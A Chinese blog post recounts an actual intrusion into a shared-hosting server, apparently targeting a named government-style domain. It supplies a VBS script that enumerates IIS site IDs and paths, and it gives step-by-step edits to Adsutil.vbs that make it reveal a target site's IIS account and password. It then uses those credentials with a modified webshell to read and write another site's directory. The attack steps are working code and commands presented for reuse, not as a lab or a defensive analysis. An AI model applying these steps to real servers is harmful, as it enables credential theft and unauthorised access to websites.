使用Adsutil.vbs脚本获取IIS配置信息及账号密码

最新推荐文章于 2020-12-05 08:57:33 发布
最新推荐文章于 2020-12-05 08:57:33 发布
阅读量664 收藏
点赞数
文章标签: 脚本入侵

今晚在搞http://gov.com.im/的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。

      无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这里我将就再帖下,并说明用法!

Set ObjService=GetObject("IIS://LocalHost/W3SVC") 
For Each obj3w In objservice 
If IsNumeric(obj3w.Name) Then 
sServerName=Obj3w.ServerComment 
Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root") 
ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf 
End If 
Next 
WScript.Echo ListAllWeb 
Set ObjService=Nothing 
WScript.Quit 

      将以上代码保存为1.vbs,执行”cscript C:\recycler\1.vbs“ 命令,cscript C:\recycler\1.vbs是我传到服务器上的路径,执行成功后就会列出IIS的基本信息了。

 



      如上图所示,列出来的信息中包含了网站id 显示名称 以及路径三个信息,这里我们要记下目标站的id为:360363061,路径为:D:\wwwroot\fucksbhack8\wwwroot。

      现在就得到了目标网站的基本信息了,但是这对我们拿下最终目标站的权限有啥用呢? 呵呵!不急,我们接下来就要想办法得到这个网站的iis用户名和密码,然后使用bs大牛写的webshell来夸目录。

      当时和龙儿心搞定了目标站路径信息后为得到目标站的IIS账号密码还真费了不少功夫,后来还是多亏了龙儿心给我看的一篇文章,仔细看了过后才明白了怎么使用Adsutil.vbs来获取IIS账号密码。首先搞个Adsutil.vbs文件来,文件内容太多,我就不贴出来了,本文中所用到的工具最后我会全部打包。

      搞到Adsutil.vbs文件后我们需要改动下内容,我首先搜索”If (Attribute = True) Then“,然后再下面几行中会看到如下内容:

    If (Attribute = True) Then
        IsSecureProperty = False
    Else
        IsSecureProperty = True
    End If

      首先我们要获取目标站点IIS的账号,我们将第一个IsSecureProperty 的值修改成IsSecureProperty = False,然后保存,上传到服务器上。

      在执行的时候我们需要用到之前使用的vbs脚本获取到目标网站的id值,这里是360363061,然后我们使用”cscript C:\recycler\k.vbs enum w3svc/360363061/root“命令来获取目标站的IIS账号信息。

 

      如上图所示,成功的获取到目标站IIS账号为sbhack8_web,接下来我们就是获取密码了,同样的方法还需要将Adsutil.vbs文件中刚才修改的地方,将第二个IsSecureProperty 修改成IsSecureProperty = False,然后再把第一个IsSecureProperty 修改成IsSecureProperty = True,既两个的值互相调换一下,然后再执行同样的命令”cscript C:\recycler\k.vbs enum w3svc/360363061/root“来获取密码信息。

 

      这样就搞到了目标站IIS用户的账号和密码了,先就要排bs大牛的shell上场了,在要使用BS大牛的shell之前我们还需要改动喜爱BS大牛的shell内容。

      搜索bs大牛shell中内容”Const bOtherUser=False“,然后修改成”Const bOtherUser=True“,保存,上传到服务器任意网站目录下,当然还是要支持asp的了,然后访问,然后出现下图所示内容。

 
 



      这里直接点击OK,然后稍等下一下就会弹出登陆框了,如下图所示:

 



      然后我们在这里输入刚才得到的目标站的IIS账号和密码,然后登陆,成功了的话就会进入shell的登录框了。

 


 


      这里如数webshell的密码进入后直接拿目标站的路径跳转,然后就会发现目标站的目录和文件全部列出来了!不BT的话是有写入权限的!!方便大家我把文章中提及的工具全部打包了!!

      *最后补充下,我下来本地测试了下Adsutil.vbs的修改地方,我们直接将If (Attribute = True) Then下面的两个IsSecureProperty值都修改为True的时候就会同时列出账号和密码了,没必要获取了账号,然后再修改下去获取密码。

 

oceanark
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Adsutil.vbs获取IIS用户密码的方法
07-14
Adsutil.vbs获取IIS用户密码的方法
[转]IIS管理脚本adsutil.vbs使用
07-18 149
Adsutil.vbs是什么?它是Windows 2003的IIS服务自带的基于命令行下的IIS管理脚本,位于%SystemDrive%\Inetpub\AdminScripts目录下,95,426字节。这么大的脚本一看就知道功能肯定非常强大,事实也确是如此。我感觉它就是个命令行下的“Internet 信息服务管理器”(事实上Windows 2000用%SystemDrive%\Inet...
IIS管理脚本adsutil.vbs使用
软件评测师VS质量工程师
09-12 1036
    Adsutil.vbs是什么?它是Windows 2003的IIS服务自带的基于命令行下的IIS管理脚本,位于%SystemDrive%/Inetpub/AdminScripts目录下,95,426字节。这么大的脚本一看就知道功能肯定非常强大,事实也确是如此。我感觉它就是个命令行下的“Internet 信息服务管理器”(事实上Windows 2000用%SystemDrive%/Ine
使用 Adsutil.vbs iis管理脚本
09-04
Adsutil.vbs 是一个 IIS 管理实用程序,它通过结合使用 Microsoft Visual Basic Scripting Edition (VBScript) 与 Active Directory 服务界面 (ADSI) 来处理 IIS 配置。该脚本应通过随 Windows 脚本主机一同安装的 ...
cscript adsutil.vbs 设置iis参数提示拒绝访问的解决方法
01-10
通过cmd下直接运行cscript就提示拒绝访问,因为通过软件开发网安全设置的机器,都是做了... 您可能感兴趣的文章:IIS管理脚本adsutil.vbs使用说明Adsutil.vbs脚本攻击中的妙用[我非我原创]使用 Adsutil.vbs iis
无法找到脚本文件adsutil.vbs的解决方法
01-10
adsutil.vbs是Windows 2003的IIS服务自带的基于命令行下的IIS管理脚本,windows 2003使用IIS6.0,现在的IIS7.0、7.5默认是不安装这个IIS6脚本工具的,找不到adsutil.vbs,那是因为安装IIS的时候没有勾选这个组件。...
adsutil.vbs
11-05
adsutil.vbs 安装SQL 2005 出现警告 32位ASP.NET已经注册,需要注册64位
Windows XP安装IIS所需文件之adsutil.zip
06-05
Windows XP安装IIS所需文件之一。在安装的过程中有几个时候是会弹出需要文件复制来源的,点击浏览找到刚下载解压的路径。
vbs破解密码
06-06
破解密码,应用密码,密码资源,密码库,密码,密码库,密码资源,应用密码,破解密码
vbs密码破解
08-27
vbs密码破解
读取IIS信息账号密码VBS脚本
05-16
能够读取IIS信息账号密码VBS脚本 包含读取IIS虚拟网站配制信息和帐号的VBS脚本
详细列出IIS里的站点ID、描述、及物理目录的vbs
06-19
详细列出IIS里的站点ID、描述、及物理目录的vbs
使用 iisweb.vbs 列出网站的方法
09-04
有时候由于网站过多想知道有哪些网站,一个一个看也挺累的,那么就可以通过iisweb.vbs 列出网站,而且还能看到每个网站的状态,是停止还是开启的
iis获取当前登录账号_【CS学习笔记】17、登录验证的难点
weixin_36187176的博客
12-05 226
0x00 前言如果当前账号权限被系统认为是本地管理员权限,那么就可以执行很多管理员才能做的事,接下来就来看一下这样的一个过程是如何工作的,其中会涉及到以下要点:1、Access Token 登录令牌2、Credentials 凭证3、Password Hashes 密码哈希4、Kerberos Tickets 登录凭据0x01 登录令牌登录令牌在登录之后被创建与每个进程和线程相关联包括:用户和用户...
获取iis 帐户密码
weixin_30855099的博客
06-11 156
位于C:\Inetpub\AdminScripts下有一个Adsutil.vbs脚本打开CMD,进入C:\Inetpub\AdminScripts目录 执行下面的语法:下表列出 Adsutil.vbs 实用工具各种功能的语法:功能语法获取 IUSR 帐户密码cscript.exe adsutil.vbs get w3svc/anonymoususerpass获取 IWAM 帐户密码cscript....
通过IIS自带工具Iisapp.vbs查询哪个站点占用资源
wanglee的专栏
11-24 2977
 通过IIS自带工具Iisapp.vbs查询哪个站点占用资源IISAPP.vbs介绍:报告服务于某个特定应用程序池当前正在运行W3pwp.exe进程的进程标识符(PID)。情况:由于服务器上架设了IIS几十个虚拟主机,某天发现IIS中某虚拟主机进程w3wp.exe占用非常大的cpu及内存,但由于过多的站点无法查出是那个站点从而进行分析排错,此时我们可以通过微软IIS自带的I
synciwam.vbsadsutil.vbs
01-03
要下的话,我知道你懂的。。。synciwam.vbsadsutil.vbs
IISAdmin服务_重新建立IUSR 和 IWAM 帐户
最新发布
06-12
C:\Inetpub\AdminScripts> cscript.exe adsutil.vbs setpassword IWAM_machineName yourPassword C:\Inetpub\AdminScripts> cscript.exe adsutil.vbs adduser IWAM_machineName IWAM_machineName C:\Inetpub\...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值